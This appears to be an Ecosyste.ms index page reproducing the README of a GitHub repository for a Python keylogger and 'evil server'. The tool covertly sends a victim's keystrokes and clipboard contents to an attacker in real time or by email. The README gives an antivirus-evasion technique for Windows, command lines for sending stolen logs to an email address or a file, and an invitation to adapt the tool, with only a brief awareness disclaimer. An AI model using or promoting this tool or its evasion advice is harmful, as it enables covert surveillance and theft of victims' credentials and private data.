Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/jsmoreira02/keylogger-evil_server
Advanced keylogger and covert channel - for receiving victim's keystrokes and clipboard data. You can send the results to the attacker's Email when the execution is finished, as well as write the digits from the target machine locally to a file
https://github.com/jsmoreira02/keylogger-evil_server
black-hat-python covert-channel cybersecurity-awareness hacking hacking-tool keylogger keylogger-python malicious-scripts
Last synced: about 10 hours ago
JSON representation
Advanced keylogger and covert channel - for receiving victim's keystrokes and clipboard data. You can send the results to the attacker's Email when the execution is finished, as well as write the digits from the target machine locally to a file
- Host: GitHub
- URL: https://github.com/jsmoreira02/keylogger-evil_server
- Owner: Jsmoreira02
- License: gpl-3.0
- Created: 2023-09-19T17:12:25.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2024-03-26T22:42:49.000Z (8 months ago)
- Last Synced: 2024-03-26T23:38:32.180Z (8 months ago)
- Topics: black-hat-python, covert-channel, cybersecurity-awareness, hacking, hacking-tool, keylogger, keylogger-python, malicious-scripts
- Language: Python
- Homepage:
- Size: 63.5 KB
- Stars: 2
- Watchers: 1
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
![272844130-8c3b2b16-ae6d-467b-82a3-0e8c0b89c46a-removebg-preview](https://github.com/Jsmoreira02/Keylogger-Evil_Server/assets/103542430/312b2d20-ecb1-42b9-9d54-2382833a7735)
Evil keylogger server (Covert Channel)
* ***Feel free to modify it as you see fit and it can be improved in many ways to suit your needs.***
This project focuses on a malicious server that remotely receives keyboard logs and data saved on the victim's clipboard, emulating an illegal covert channel between the victim and the attacker. When the victim runs the keylogger, the first thing it will do is connect to the attacker's remote server and send the logs in real time. It has been carefully designed to present the keyboard logs in the most user-friendly way possible.
****(Remember to add your local or proxy IP address in the keylogger script)****
### Evading the antivirus (Windows 10/11):
Simple technique: Compile the PyInstaller bootloader locally using Microsoft C/C++ compiler and then use pyinstaller to compile the keylogger code.# Optionals
#### Send the keyboard logs to the attacker's e-mail address
`./app.py 192.168.32.34 -e smtp.gmail.com`
![Peek 12-01-2024 00-33](https://github.com/Jsmoreira02/Keylogger-Evil_Server/assets/103542430/6d4b9199-5b1a-41ac-a82c-cf6d8b7bcd31)
#### Write the keystroke logs to a file
`./app.py 192.168.18.20 -f keylogs.txt`
![Peek 12-01-2024 00-34](https://github.com/Jsmoreira02/Keylogger-Evil_Server/assets/103542430/b4470ef2-1f89-4823-b7d2-aa012f3a698c)
# Warning:
> I am not responsible for any illegal use or damage caused by this tool. It primarily serves as a proof of concept and is intended to raise awareness about cybersecurity